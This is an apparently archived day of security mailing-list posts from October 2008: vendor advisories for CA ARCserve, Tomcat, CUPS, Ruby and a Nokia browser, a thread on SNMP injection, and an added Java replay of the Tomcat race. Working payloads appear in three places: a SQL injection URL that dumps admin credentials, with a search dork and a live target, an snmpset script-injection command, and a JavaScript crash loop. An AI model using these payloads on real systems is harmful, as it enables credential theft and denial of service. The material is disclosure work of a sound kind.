CA ARCserve Backup Multiple Vulnerabilities

2008-10-10 Thread Williams, James K


Title: CA ARCserve Backup Multiple Vulnerabilities


CA Advisory Date: 2008-10-09


Reported By:
Haifei Li of Fortinet's FortiGuard Global Security Research Team
Vulnerability Research Team of Assurent Secure Technologies, a 
   TELUS Company
Greg Linares of eEye Digital Security


Impact: A remote attacker can cause a denial of service or 
possibly execute arbitrary code.


Summary: CA ARCserve Backup contains multiple vulnerabilities that 
can allow a remote attacker to cause a denial of service or 
possibly execute arbitrary code. CA has issued patches to address 
the vulnerabilities. The first vulnerability, CVE-2008-4397, 
occurs due to insufficient validation of certain RPC call 
parameters by the message engine service. An attacker can exploit 
a directory traversal vulnerability to execute arbitrary commands. 
The second vulnerability, CVE-2008-4398, occurs due to 
insufficient validation by the tape engine service. An attacker 
can make a request that will crash the service. The third 
vulnerability, CVE-2008-4399, occurs due to insufficient 
validation by the database engine service. An attacker can make a 
request that will crash the service. The fourth vulnerability, 
CVE-2008-4400, occurs due to insufficient validation of 
authentication credentials. An attacker can make a request that 
will crash multiple services. Note that these issues only affect 
the base product.


Mitigating Factors: None


Severity: CA has given these vulnerabilities a High risk rating.


Affected Products:
CA ARCserve Backup r12.0 Windows
CA ARCserve Backup r11.5 Windows*
CA ARCserve Backup r11.1 Windows*
CA Server Protection Suite r2
CA Business Protection Suite r2
CA Business Protection Suite for Microsoft Small Business Server 
   Standard Edition r2
CA Business Protection Suite for Microsoft Small Business Server 
   Premium Edition r2

*Formerly known as BrightStor ARCserve Backup.


Non-Affected Products
CA ARCserve Backup r12.0 Windows SP1


Affected Platforms:
Windows


Status and Recommendation:
CA has issued the following updates for systems that have an 
affected base product.

CA ARCserve Backup r12.0 Windows:
Apply Service Pack 1 (RO01340)

CA ARCserve Backup r11.5 Windows:
RO02398

CA ARCserve Backup r11.1 Windows:
RO02396

CA Protection Suites r2:
RO02398


How to determine if you are affected:
CA ARCserve Backup r12.0 Windows,
CA ARCserve Backup r11.5 Windows:

   1. Run the ARCserve Patch Management utility. From the Windows
      Start menu, it can be found under Programs -> CA -> ARCserve
      Patch Management -> Patch Status.
   2. The main patch status screen will indicate if the respective
      patch in the table below is currently applied. If the patch
      is not applied, the installation is vulnerable.

Product                            Patch
CA ARCserve Backup r12.0 Windows   RO01340
CA ARCserve Backup r11.5 Windows   RO02398

For more information on the ARCserve Patch Management utility, 
read document TEC446265.

Alternatively, use the file information below to determine if the 
product installation is vulnerable.

CA ARCserve Backup r12.0 Windows,
CA ARCserve Backup r11.5 Windows,
CA ARCserve Backup r11.1 Windows:

   1. Using Windows Explorer, locate the file asdbapi.dll. By
      default, the file is located in the
      C:\Program Files\CA\BrightStor ARCserve Backup directory.
   2. Right click on the file and select Properties.
   3. Select the General tab.
   4. If the file timestamp is earlier than indicated in the table
      below, the installation is vulnerable.

Product version: CA ARCserve Backup r11.1 Windows
File Name: asdbapi.dll
File Size: 856064 bytes
Timestamp: 09/05/2008 10:35:19

Product version: CA ARCserve Backup r11.5 Windows*
File Name: asdbapi.dll
File Size: 1249354 bytes
Timestamp: 09/05/2008 11:14:04

Product version: CA ARCserve Backup r12.0 Windows
File Name: asdbapi.dll
File Size: 992520 bytes
Timestamp: 08/09/2008 4:51:58

*CA Protection Suites r2 includes CA ARCserve Backup 11.5


Workaround: None


References (URLs may wrap):
CA Support:
http://support.ca.com/
Security Notice for CA ARCserve Backup
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=188143
Solution Document Reference APARs:
RO01340, RO02398, RO02396
CA Security Response Blog posting:
CA ARCserve Backup Multiple Vulnerabilities
community.ca.com/blogs/casecurityresponseblog/archive/2008/10/9.aspx
Reported By: 
CVE-2008-4397 - Haifei Li of Fortinet's FortiGuard Global Security 
   Research Team
http://www.fortiguardcenter.com/
CVE-2008-4398 - Vulnerability Research Team of Assurent Secure 
   Technologies, a TELUS Company
CVE-2008-4399 - Vulnerability Research Team of Assurent Secure 
   Technologies, a TELUS Company
http://www.assurent.com/index.php?id=17
CVE-2008-4400 - Greg Linares of eEye Digital Security
http://www.eeye.com/
CVE References:
CVE-2008-4397 - Message engine command injection
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4397
CVE-2008-4398 - Tape 

Re: News Manager Remote SQL Injection Vulnerability

2008-10-10 Thread packet
Discovered over a year ago.

http://packetstormsecurity.org/0705-exploits/prenews-sql.txt 
0bae5b1d6f9d99c6749403341807f0d8 Pre News Manager version 1.0 suffers from a
remote SQL injection vulnerability. Homepage: http://www.cyber-security.org/.

On Thu, Oct 09, 2008 at 12:21:25PM +0300, Ghost hacker wrote:
 
 
 # News Manager Remote SQL Injection Vulnerability 
  #
 # © Ghost Hacker , Real Hack Back :)  
  #
 
 #[~] Author : Ghost Hacker
  #
 #[~] Home page : www.Real-h.com  [Real Hack Back] 
  #
 #[~] Contact Me : [EMAIL PROTECTED]   
 #
 #[~] Bug : SQL Injection  
  #
 #[~] From : Kingdom Saudi Arabia  
  #
 #[~] Name Script : News Manager   
  #
 #[~] Download : http://www.preprojects.com/news.asp   
  #
 
 #[~] Dork :   
  #
 # ©2006 PRE NEWS MANAGER | All Rights Reserved Or inurl:news_detail.php?nid=  
  #
 #[~] Exploit :
  #
 # 
 http:///news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin--
 #[~] live demo :  
  #
 # http://www.preproject.com/news 
 manager/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin--
 
 #[~]Greets :  
  #
 # Mr.SQL , Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar 
 al3noOoz , LJ TeaM  #
 # Mr.MN7oS , Mr.Hope , EgYpTiaN x HaCkEr , PrO SpY , v4-team.com  
  #
 # All Members Real Hack , All My Friends :)   
  #
 
 # Viva Real Hack - Real-h.com ..  
  #
 


[SECURITY] CVE-2008-3271 - Apache Tomcat information disclosure

2008-10-10 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2008-3271: Tomcat information disclosure vulnerability

Severity: Low

Vendor:
The Apache Software Foundation

Versions Affected:
Tomcat 4.1.0 to 4.1.31
Tomcat 5.5.0
Tomcat 6.0.x is not affected
The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may also be affected

Description:
Bug 25835 (https://issues.apache.org/bugzilla/show_bug.cgi?id=25835) can,
in very rare circumstances, permit a user from a non-permitted IP address
to gain access to a context protected with a valve that extends
RemoteFilterValve.

Mitigation:
Upgrade to:
4.1.32 or later
5.5.1 or later
6.0.0 or later

Example:
This has only been reproduced using a debugger to force a particular
processing sequence across two threads.

1. Set a breakpoint right after the place where a value
   is to be entered in the instance variable of regexp
   (search:org.apache.regexp.CharacterIterator).

2. Send a request from the IP address* which is not permitted.
   (stopped at the breakpoint)

   *About the IP address which is not permitted:
   Its character string length must be the same as that of the
   IP address which is set in RemoteAddrValve.

3. Send a request from the IP address which was set in
   RemoteAddrValve.
   (stopped at the breakpoint)
   In this way, the instance variable is to be overwritten here.

4. Resume the thread which is processing the step 2 above.

5. The request from the not permitted IP address will succeed.

Credit:
This issue was discovered by Kenichi Tsukamoto (Development Dept. II,
Application Management Middleware Div., FUJITSU LIMITED) and reported to
the Tomcat security team via JPCERT.

References:
http://tomcat.apache.org/security.html

Mark Thomas
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkjuibsACgkQb7IeiTPGAkO33wCgiBY0nBdTaXBC8oPoHqMWH4mt
OtgAmQHjgnxg0vKKSp43vez8XaBIZpOj
=9Z/F
-END PGP SIGNATURE-
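
The interleaving in steps 1 to 5 of the Tomcat advisory above, replayed as an added example (not Tomcat source code and not code from the advisory). All class, field and method names are hypothetical, the latches stand in for the debugger breakpoints, and the addresses are constructed; the per-call matcher is one way to remove the shared state, shown for contrast.

```java
import java.util.concurrent.CountDownLatch;
import java.util.regex.Pattern;

// Added illustration; not Tomcat source. All class, field and method names are hypothetical.
public class SharedMatcherRace {

    // Stand-in for a regexp object that stores the string under test in an
    // instance field between loading it and evaluating it.
    static class StatefulMatcher {
        private final Pattern allow;
        private volatile String subject;   // shared state: the root of the problem

        StatefulMatcher(String regex) { allow = Pattern.compile(regex); }
        void load(String s) { subject = s; }
        boolean evaluate() { return allow.matcher(subject).matches(); }
    }

    static final String ALLOW_REGEX = "192\\.168\\.1\\.10";
    static final String PERMITTED = "192.168.1.10";   // constructed address
    static final String DENIED = "192.168.1.99";      // constructed, same string length

    // Vulnerable shape: one matcher instance serves every request thread, unlocked.
    static final StatefulMatcher SHARED = new StatefulMatcher(ALLOW_REGEX);

    // Hardened shape: the pattern is immutable and each call gets its own matcher,
    // so nothing written by one request is visible to another.
    static final Pattern ALLOW = Pattern.compile(ALLOW_REGEX);
    static boolean isAllowedPerCall(String ip) { return ALLOW.matcher(ip).matches(); }

    // Replays steps 2 to 5; the latches play the role of the debugger breakpoints.
    static boolean deniedClientAllowedBySharedMatcher() throws InterruptedException {
        CountDownLatch deniedLoaded = new CountDownLatch(1);
        CountDownLatch permittedLoaded = new CountDownLatch(1);
        boolean[] result = new boolean[1];

        Thread deniedClient = new Thread(() -> {
            SHARED.load(DENIED);                   // step 2: store address, then "pause"
            deniedLoaded.countDown();
            try {
                permittedLoaded.await();
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();
                return;
            }
            result[0] = SHARED.evaluate();         // steps 4-5: resume, test overwritten value
        });
        Thread permittedClient = new Thread(() -> {
            try {
                deniedLoaded.await();
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();
                return;
            }
            SHARED.load(PERMITTED);                // step 3: overwrite the shared field
            permittedLoaded.countDown();
        });

        deniedClient.start();
        permittedClient.start();
        deniedClient.join();
        permittedClient.join();
        return result[0];
    }

    public static void main(String[] args) throws InterruptedException {
        System.out.println("shared matcher admits denied client:   "
                + deniedClientAllowedBySharedMatcher());
        System.out.println("per-call matcher admits denied client: "
                + isAllowedPerCall(DENIED));
    }
}
```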



ZDI-08-067: Apple CUPS 1.3.7 (HP-GL/2 filter) Remote Code Execution Vulnerability

2008-10-10 Thread zdi-disclosures
ZDI-08-067: Apple CUPS 1.3.7 (HP-GL/2 filter) Remote Code Execution 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-067
October 9, 2008

-- CVE ID:
CVE-2008-3641

-- Affected Vendors:
Apple

-- Affected Products:
Apple OS X

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6325. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple CUPS. Authentication is not required
to exploit this vulnerability.

The specific flaw exists in the Hewlett-Packard Graphics Language
filter. Inadequate bounds checking on the pen width and pen color
opcodes result in an arbitrary memory overwrite allowing for the
execution of arbitrary code as the hgltops process uid.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT3216

-- Disclosure Timeline:
2008-08-19 - Vulnerability reported to vendor
2008-10-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* regenrecht

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/



[USN-651-1] Ruby vulnerabilities

2008-10-10 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-651-1   October 10, 2008
ruby1.8 vulnerabilities
CVE-2008-2376, CVE-2008-3443, CVE-2008-3655, CVE-2008-3656,
CVE-2008-3657, CVE-2008-3790, CVE-2008-3905
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libruby1.8  1.8.4-1ubuntu1.6
  ruby1.8     1.8.4-1ubuntu1.6

Ubuntu 7.04:
  libruby1.8  1.8.5-4ubuntu2.3
  ruby1.8     1.8.5-4ubuntu2.3

Ubuntu 7.10:
  libruby1.8  1.8.6.36-1ubuntu3.3
  ruby1.8     1.8.6.36-1ubuntu3.3

Ubuntu 8.04 LTS:
  libruby1.8  1.8.6.111-2ubuntu1.2
  ruby1.8     1.8.6.111-2ubuntu1.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Akira Tagoh discovered a vulnerability in Ruby which led to an integer
overflow. If a user or automated system were tricked into running a
malicious script, an attacker could cause a denial of service or
possibly execute arbitrary code with the privileges of the user
invoking the program. (CVE-2008-2376)

Laurent Gaffie discovered that Ruby did not properly check for memory
allocation failures. If a user or automated system were tricked into
running a malicious script, an attacker could cause a denial of
service. (CVE-2008-3443)

Keita Yamaguchi discovered several safe level vulnerabilities in Ruby.
An attacker could use this to bypass intended access restrictions.
(CVE-2008-3655)

Keita Yamaguchi discovered that WEBrick in Ruby did not properly
validate paths ending with .. A remote attacker could send a crafted
HTTP request and cause a denial of service. (CVE-2008-3656)

Keita Yamaguchi discovered that the dl module in Ruby did not check
the taintness of inputs. An attacker could exploit this vulnerability
to bypass safe levels and execute dangerous functions. (CVE-2008-3657)

Luka Treiber and Mitja Kolsek discovered that REXML in Ruby did not
always use expansion limits when processing XML documents. If a user or
automated system were tricked into opening a crafted XML file, an attacker
could cause a denial of service via CPU consumption. (CVE-2008-3790)

Jan Lieskovsky discovered several flaws in the name resolver of Ruby. A
remote attacker could exploit this to spoof DNS entries, which could
lead to misdirected traffic. This is a different vulnerability from
CVE-2008-1447. (CVE-2008-3790)


Updated packages for Ubuntu 6.06 LTS:



Re: PR08-24: Proxim Tsunami MP.11 2411 vulnerable to SNMP Injection

2008-10-10 Thread ProCheckUp Research
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi 3APA3A,

That's a good question, and here is my answer from the draft version of
an upcoming paper I'm working on:


Gaining SNMP write access to a device is already a compromise on its own
and usually considered a potential high risk security issue. Therefore,
one could argue that there is no point in launching a SNMP injection
attack when we can already change system settings via the SNMP write
community string. You might be wondering: why bother injecting a
HTML/JavaScript payload on the web console through SNMP when I can
change system parameters via SNMP alone?

In reality however, when a valid SNMP write community is identified, we
find that many OIDs cannot be changed due to read-only settings enforced
on that particular object. Instead, we are restricted to only being able
to change a limited number of OIDs.

What OIDs can be modified with a SNMP write community string depends on
two factors:

- Specific vendor implementation of SNMP write permissions
- SNMP RFCs

By being able to change a limited number of OIDs via a SNMP write
community string, the attacker might be able to DoS the device by
crippling its configuration settings or even deface some banners.
However, a serious attacker is ultimately interested in gaining full
access (admin/root) to the target device. Since identifying a valid SNMP
write community string might not be enough to accomplish such goal, it
makes sense to resort to SNMP injection.


Hope that helps.

Regards,
ap.

Vladimir '3APA3A' Dubrovin wrote:
 Dear ProCheckUp Research,
 
  What  can  you  achieve  with script injection you can not achieve with
  SNMP write access?
 
 --Thursday, October 9, 2008, 5:02:44 PM, you wrote to 
 bugtraq@securityfocus.com:
 
 PR $ snmpset -v1 -c public 192.168.1.100 sysName.0 s '<script>alert(1)</script>'
 
 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFI7xPVoR/Hvsj3i8sRAlIUAJ9ZWNliZ18Akibq0R7XuHSDMiPCsQCdGZi8
Hrr0hjnddyfu+8pUqKeJcXk=
=UIm8
-END PGP SIGNATURE-


Re[2]: PR08-24: Proxim Tsunami MP.11 2411 vulnerable to SNMP Injection

2008-10-10 Thread Vladimir '3APA3A' Dubrovin
Dear [EMAIL PROTECTED],

Why do you think you can't do it with SNMP? Examples are setting the DNS
server option via DHCP (or the DNS domain name for the proxy server
autodiscovery protocol) or even configuring a VPN tunnel for all
traffic. I'm not sure about Tsunami; for Orinoco these settings are
read/write:

http://support.ipmonitor.com/mibs/ORINOCO-MIB/oids.aspx

see e.g. oriDHCPServerPrimaryDNSIPAddress

--Friday, October 10, 2008, 1:24:27 AM, you wrote to [EMAIL PROTECTED]:

lercg -Vladimir '3APA3A' Dubrovin [EMAIL PROTECTED] wrote: -

What  can  you  achieve  with script injection you can not achieve
with SNMP write access?

lercg I don't know what you can actually achieve, but in addition to whatever you
lercg can do to/with the box you have SNMP write access for, it gives you a shot
lercg at the admin's machine.  And maybe even a shot at everything that the
lercg admin's machine can talk to.

lercg Regards,
lercg Lee



--Thursday, October 9, 2008, 5:02:44 PM, you wrote to
bugtraq@securityfocus.com:

PR $ snmpset -v1 -c public 192.168.1.100 sysName.0 s '<script>alert(1)</script>'


--
~/ZARAZA http://securityvulns.com/


-- 
~/ZARAZA http://securityvulns.com/
Even if you do receive some letter, you still will not be able to
read it. (Twain)



[LC-2008-04] Nokia Browser Array Sort Denial Of Service Vulnerability

2008-10-10 Thread luca . carettoni
 

Security Research Advisory

Vulnerability name: Nokia Browser Array Sort Denial Of Service Vulnerability
Advisory number: LC-2008-04
Advisory URL: http://www.ikkisoft.com

1) Affected Software

* Nokia Mini Map Browser (S60WebKit = 21772)

The tested device has the following User-Agent:
Mozilla/5.0 (SymbianOS/9.2;U;Series60/3.1 NokiaE90-1/210.34.75
Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML)
Safari/413

Note: Although the Nokia Web Browser is built upon a port of the
open source WebKit used by Apple for its browser, the iPhone is not
affected (at least the iPhone firmware version 2.0.2(5C1))

2) Severity

Severity: Low
Local/Remote: Remote

3) Summary

The Web Browser for S60 (formerly called Nokia Mini Map Browser) is a web
browser for the S60 mobile phone platform developed by Nokia.
It is built upon S60WebKit, a port of the open source WebKit project to the S60
platform. According to several sources, the S60 software on Symbian OS is the
world's most popular software for smartphones.

This version of the Nokia Mini Map Browser does not properly validate JavaScript
input embedded in visited HTML pages. An aggressor can easily trigger Denial of
Service attacks.

References:
http://opensource.nokia.com/projects/S60browser/
http://en.wikipedia.org/wiki/Web_Browser_for_S60

4) Vulnerability Details

The Nokia Mini Map Browser is prone to a vulnerability that may result in a
silent crash of the application. Arbitrary code execution is probably not possible.
The problem arises in the JavaScript core of the S60WebKit when the sort()
function is invoked on a recursive array.
A similar behavior was observed some years ago in several browsers due to
the common code base (BID-12331, BID-11762, BID-11760, BID-11759,
BID-11752).

5) Exploit

Embed in an HTML page the following JavaScript:

<script>
foo = new Array();
while(true) {foo = new Array(foo).sort();}
</script>

6) Fix Information

n/a

7) Time Table

08/09/2008 - Vendor notified.
15/09/2008 - Vendor response.
??/??/ - Vendor patch release.
10/10/2008 - Public disclosure.

8) Credits

Discovered by Luca Carettoni - luca.carettoni[at]ikkisoft[dot]com

9) Legal Notices

The information in the advisory is believed to be accurate at the time of
publishing based on currently available information.
This information is provided as-is, as a free service to the community.
There are no warranties with regard to this information.
The author does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
Permission is hereby granted for the redistribution of this alert, provided
that the content is not altered in any way, except reformatting, and that due
credit is given.

This vulnerability has been disclosed in accordance with the RFP
Full-Disclosure Policy v2.0, available at:
http://www.wiretrip.net/rfp/policy.html